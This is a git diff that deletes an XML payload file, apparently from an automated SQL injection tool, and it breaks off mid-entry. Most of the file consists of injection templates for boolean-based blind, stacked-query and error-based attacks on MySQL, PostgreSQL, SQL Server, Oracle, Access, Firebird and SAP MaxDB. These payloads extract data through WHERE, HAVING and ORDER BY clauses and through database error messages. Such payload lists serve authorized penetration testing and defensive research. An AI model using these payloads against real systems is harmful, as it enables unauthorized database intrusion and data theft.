diff --git a/xml/payloads/00_payloads.xml b/xml/payloads/00_payloads.xml
deleted file mode 100644
index 7799d4b66..000000000
--- a/xml/payloads/00_payloads.xml
+++ /dev/null
@@ -1,4288 +0,0 @@
-
-
-
-
-
-
-
- AND boolean-based blind - WHERE or HAVING clause
- 1
- 1
- 1
- 1
- 1
- AND [INFERENCE]
-
- AND [RANDNUM]=[RANDNUM]
-
-
- AND [RANDNUM]=[RANDNUM1]
-
-
-
-
- AND boolean-based blind - WHERE or HAVING clause (MySQL comment)
- 1
- 4
- 1
- 1
- 1
- AND [INFERENCE]
-
- AND [RANDNUM]=[RANDNUM]
- #
-
-
- AND [RANDNUM]=[RANDNUM1]
-
-
- MySQL
-
-
-
-
- AND boolean-based blind - WHERE or HAVING clause (Generic comment)
- 1
- 4
- 1
- 1
- 1
- AND [INFERENCE]
-
- AND [RANDNUM]=[RANDNUM]
- --
-
-
- AND [RANDNUM]=[RANDNUM1]
-
-
-
-
- OR boolean-based blind - WHERE or HAVING clause
- 1
- 2
- 3
- 1
- 2
- OR ([INFERENCE])
-
- OR ([RANDNUM]=[RANDNUM])
-
-
- OR ([RANDNUM]=[RANDNUM1])
-
-
-
-
- OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
- 1
- 3
- 3
- 1
- 2
- OR ([INFERENCE])
-
- OR ([RANDNUM]=[RANDNUM])
- #
-
-
- OR ([RANDNUM]=[RANDNUM1])
-
-
- MySQL
-
-
-
-
- OR boolean-based blind - WHERE or HAVING clause (Generic comment)
- 1
- 3
- 3
- 1
- 2
- OR ([INFERENCE])
-
- OR ([RANDNUM]=[RANDNUM])
- --
-
-
- OR ([RANDNUM]=[RANDNUM1])
-
-
-
-
- MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
- 1
- 3
- 1
- 1,2,3
- 1
- RLIKE (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 0x28 END))
-
- RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 0x28 END))
-
-
- RLIKE (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 0x28 END))
-
-
- MySQL
-
-
-
-
-
-
- Generic boolean-based blind - Parameter replace (original value)
- 1
- 2
- 1
- 1,2,3
- 3
- (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))
-
- (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))
-
-
- (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))
-
-
-
-
- MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)
- 1
- 3
- 1
- 1,2,3
- 3
- MAKE_SET([INFERENCE],[ORIGVALUE])
-
- MAKE_SET([RANDNUM]=[RANDNUM],[ORIGVALUE])
-
-
- MAKE_SET([RANDNUM]=[RANDNUM1],[ORIGVALUE])
-
-
- MySQL
-
-
-
-
- MySQL boolean-based blind - Parameter replace (ELT - original value)
- 1
- 4
- 1
- 1,2,3
- 3
- ELT([INFERENCE],[ORIGVALUE])
-
- ELT([RANDNUM]=[RANDNUM],[ORIGVALUE])
-
-
- ELT([RANDNUM]=[RANDNUM1],[ORIGVALUE])
-
-
- MySQL
-
-
-
-
- MySQL boolean-based blind - Parameter replace (bool*int - original value)
- 1
- 4
- 1
- 1,2,3
- 3
- ([INFERENCE])*[ORIGVALUE]
-
- ([RANDNUM]=[RANDNUM])*[ORIGVALUE]
-
-
- ([RANDNUM]=[RANDNUM1])*[ORIGVALUE]
-
-
- MySQL
-
-
-
-
- MySQL >= 5.0 boolean-based blind - Parameter replace (original value)
- 1
- 3
- 1
- 1,2,3
- 3
- (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
-
- (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
-
-
- (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
-
-
- MySQL
- >= 5.0
-
-
-
-
- MySQL < 5.0 boolean-based blind - Parameter replace (original value)
- 1
- 4
- 1
- 1,2,3
- 3
- (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))
-
- (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))
-
-
- (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))
-
-
- MySQL
-
-
-
-
- PostgreSQL boolean-based blind - Parameter replace (GENERATE_SERIES - original value)
- 1
- 3
- 2
- 1,2,3
- 3
- (SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([INFERENCE]) THEN 1 ELSE 0 END) LIMIT 1)
-
- (SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) LIMIT 1)
-
-
- (SELECT GENERATE_SERIES([ORIGVALUE],[ORIGVALUE],CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 0 END) LIMIT 1)
-
-
- PostgreSQL
-
-
-
-
- Microsoft SQL Server/Sybase boolean-based blind - Parameter replace (original value)
- 1
- 3
- 1
- 1,3
- 3
- (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))
-
- (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))
-
-
- (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))
-
-
- Microsoft SQL Server
- Sybase
- Windows
-
-
-
-
- Oracle boolean-based blind - Parameter replace (original value)
- 1
- 3
- 1
- 1,3
- 3
- (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
-
- (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
-
-
- (SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
-
-
- Oracle
-
-
-
-
- Microsoft Access boolean-based blind - Parameter replace (original value)
- 1
- 3
- 1
- 1,3
- 3
- IIF([INFERENCE],[ORIGVALUE],1/0)
-
- IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0)
-
-
- IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0)
-
-
- Microsoft Access
-
-
-
-
- SAP MaxDB boolean-based blind - Parameter replace (original value)
- 1
- 3
- 1
- 1,3
- 3
- (CASE WHEN [INFERENCE] THEN [ORIGVALUE] ELSE NULL END)
-
- (CASE WHEN [RANDNUM]=[RANDNUM] THEN [ORIGVALUE] ELSE NULL END)
-
-
- (CASE WHEN [RANDNUM]=[RANDNUM1] THEN [ORIGVALUE] ELSE NULL END)
-
-
- SAP MaxDB
-
-
-
-
-
-
-
- Generic boolean-based blind - GROUP BY and ORDER BY clauses
- 1
- 3
- 1
- 2,3
- 1
- ,(SELECT (CASE WHEN ([INFERENCE]) THEN 1 ELSE 1/(SELECT 0) END))
-
- ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 1/(SELECT 0) END))
-
-
- ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN 1 ELSE 1/(SELECT 0) END))
-
-
-
-
- Generic boolean-based blind - GROUP BY and ORDER BY clauses (original value)
- 1
- 4
- 1
- 2,3
- 1
- ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))
-
- ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))
-
-
- ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE 1/(SELECT 0) END))
-
-
-
-
- MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses
- 1
- 3
- 1
- 2,3
- 1
- ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
-
- ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
-
-
- ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
-
-
- MySQL
- >= 5.0
-
-
-
-
- MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses
- 1
- 4
- 1
- 2,3
- 1
- ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))
-
- ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))
-
-
- ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM mysql.db) END))
-
-
- MySQL
-
-
-
-
- Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause
- 1
- 3
- 1
- 3
- 1
- ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))
-
- ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))
-
-
- ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE [RANDNUM]*(SELECT [RANDNUM] FROM master..sysdatabases) END))
-
-
- Microsoft SQL Server
- Sybase
- Windows
-
-
-
-
- Oracle boolean-based blind - GROUP BY and ORDER BY clauses
- 1
- 3
- 1
- 2,3
- 1
- ,(SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
-
- ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
-
-
- ,(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [ORIGVALUE] ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)
-
-
- Oracle
-
-
-
-
- Microsoft Access boolean-based blind - GROUP BY and ORDER BY clauses
- 1
- 3
- 1
- 2,3
- 1
- ,IIF([INFERENCE],[ORIGVALUE],1/0)
-
- ,IIF([RANDNUM]=[RANDNUM],[ORIGVALUE],1/0)
-
-
- ,IIF([RANDNUM]=[RANDNUM1],[ORIGVALUE],1/0)
-
-
- Microsoft Access
-
-
-
-
-
-
-
-
- Microsoft SQL Server/Sybase stacked conditional-error blind queries
- 1
- 3
- 0
- 0
- 1
- ; IF([INFERENCE]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]
-
- ; IF([RANDNUM]=[RANDNUM]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]
- --
-
-
- ; IF([RANDNUM]=[RANDNUM1]) SELECT [RANDNUM] ELSE DROP FUNCTION [RANDSTR]
-
-
- Microsoft SQL Server
- Sybase
- Windows
-
-
-
-
- PostgreSQL stacked conditional-error blind queries
- 1
- 3
- 0
- 0
- 2
- ; SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)
-
- ; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)
- --
-
-
- ; SELECT (CASE WHEN ([RANDNUM]=[RANDNUM1]) THEN [RANDNUM] ELSE 1/(SELECT 0) END)
-
-
- PostgreSQL
-
-
-
-
-
-
- MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- 2
- 1
- 0
- 1
- 1
- AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
-
- AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MySQL
- >= 5.0
-
-
-
-
- MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE)
- 2
- 2
- 0
- 1
- 1
- AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))
-
- AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MySQL
- >= 5.1
-
-
-
-
- MySQL >= 5.1 AND error-based - WHERE or HAVING clause (UPDATEXML)
- 2
- 3
- 0
- 1
- 1
- AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])
-
- AND UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MySQL
- >= 5.1
-
-
-
-
- MySQL >= 5.5 AND error-based - WHERE or HAVING clause (BIGINT UNSIGNED)
- 2
- 4
- 0
- 1
- 1
- AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))
-
- AND (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MySQL
- >= 5.5
-
-
-
-
- MySQL >= 4.1 AND error-based - WHERE or HAVING clause
- 2
- 2
- 0
- 1
- 1
- AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)
-
- AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MySQL
- >= 4.1
-
-
-
-
- PostgreSQL AND error-based - WHERE or HAVING clause
- 2
- 1
- 0
- 1
- 1
- AND [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)
-
- AND [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- PostgreSQL
-
-
-
-
- Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
- 2
- 1
- 0
- 1
- 1
- AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
-
- AND [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- Microsoft SQL Server
- Sybase
- Windows
-
-
-
-
- Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)
- 2
- 2
- 0
- 1
- 1
- AND [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
-
- AND [RANDNUM] IN (('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- Microsoft SQL Server
- Sybase
- Windows
-
-
-
-
- Oracle AND error-based - WHERE or HAVING clause (XMLType)
- 2
- 1
- 0
- 1
- 1
- AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'),'#','[HASH_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
-
- AND [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- Oracle
-
-
-
-
- Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)
- 2
- 2
- 0
- 1
- 1
- AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')
-
- AND [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- Oracle
- >= 8.1.6
-
-
-
-
- Oracle AND error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)
- 2
- 3
- 0
- 1
- 1
- AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')
-
- AND [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- Oracle
-
-
-
-
- Firebird AND error-based - WHERE or HAVING clause
- 2
- 2
- 0
- 1
- 1
- AND [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')
-
- AND [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- Firebird
-
-
-
-
- MySQL >= 5.0 OR error-based - WHERE or HAVING clause
- 2
- 2
- 2
- 1
- 2
- OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
-
- OR (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MySQL
- >= 5.0
-
-
-
-
- MySQL >= 5.1 OR error-based - WHERE or HAVING clause (EXTRACTVALUE)
- 2
- 3
- 2
- 1
- 1
- OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'))
-
- OR EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MySQL
- >= 5.1
-
-
-
-
- MySQL >= 5.1 OR error-based - WHERE or HAVING clause (UPDATEXML)
- 2
- 4
- 2
- 1
- 1
- OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]'),[RANDNUM1])
-
- OR UPDATEXML([RANDNUM],CONCAT('.','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'),[RANDNUM1])
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MySQL
- >= 5.1
-
-
-
-
- MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)
- 2
- 5
- 2
- 1
- 1
- OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))
-
- OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]','x'))s), 8446744073709551610, 8446744073709551610)))
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MySQL
- >= 5.5
-
-
-
-
- MySQL >= 4.1 OR error-based - WHERE or HAVING clause
- 2
- 2
- 2
- 1
- 2
- OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)
-
- OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2] UNION SELECT [RANDNUM3] UNION SELECT [RANDNUM4] UNION SELECT [RANDNUM5])a GROUP BY x)
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MySQL
- >= 4.1
-
-
-
-
- MySQL OR error-based - WHERE or HAVING clause
- 2
- 3
- 2
- 1
- 2
- OR 1 GROUP BY CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)
-
- OR 1 GROUP BY CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2)) HAVING MIN(0)
- #
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- MySQL
-
-
-
-
- PostgreSQL OR error-based - WHERE or HAVING clause
- 2
- 2
- 2
- 1
- 2
- OR [RANDNUM]=CAST('[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]' AS NUMERIC)
-
- OR [RANDNUM]=CAST('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]' AS NUMERIC)
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- PostgreSQL
-
-
-
-
- Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause
- 2
- 2
- 2
- 1
- 2
- OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
-
- OR [RANDNUM]=CONVERT(INT,(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- Microsoft SQL Server
- Sybase
- Windows
-
-
-
-
- Microsoft SQL Server/Sybase OR error-based - WHERE or HAVING clause (IN)
- 2
- 3
- 2
- 1
- 2
- OR [RANDNUM] IN (('[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]'))
-
- OR [RANDNUM] IN (('[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]'))
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- Microsoft SQL Server
- Sybase
- Windows
-
-
-
-
- Oracle OR error-based - WHERE or HAVING clause (XMLType)
- 2
- 2
- 2
- 1
- 2
- OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(REPLACE(REPLACE(REPLACE(([QUERY]),' ','[SPACE_REPLACE]'),'$','[DOLLAR_REPLACE]'),'@','[AT_REPLACE]'))||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
-
- OR [RANDNUM]=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||'[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'||CHR(62))) FROM DUAL)
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- Oracle
-
-
-
-
- Oracle OR error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)
- 2
- 3
- 2
- 1
- 2
- OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')
-
- OR [RANDNUM]=UTL_INADDR.GET_HOST_ADDRESS('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]')
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- Oracle
- >= 8.1.6
-
-
-
-
- Oracle OR error-based - WHERE or HAVING clause (CTXSYS.DRITHSX.SN)
- 2
- 4
- 2
- 1
- 2
- OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],'[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')
-
- OR [RANDNUM]=CTXSYS.DRITHSX.SN([RANDNUM],('[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]'))
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- Oracle
-
-
-
-
- Firebird OR error-based - WHERE or HAVING clause
- 2
- 3
- 2
- 1
- 2
- OR [RANDNUM]=('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]')
-
- OR [RANDNUM]=('[DELIMITER_START]'||(SELECT CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END FROM RDB$DATABASE)||'[DELIMITER_STOP]')
-
-
- [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
-
-
- Firebird
-
-
-
-
-
-
-
- MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)
- 2
- 2
- 0
- 1,2,3,4,5
- 1
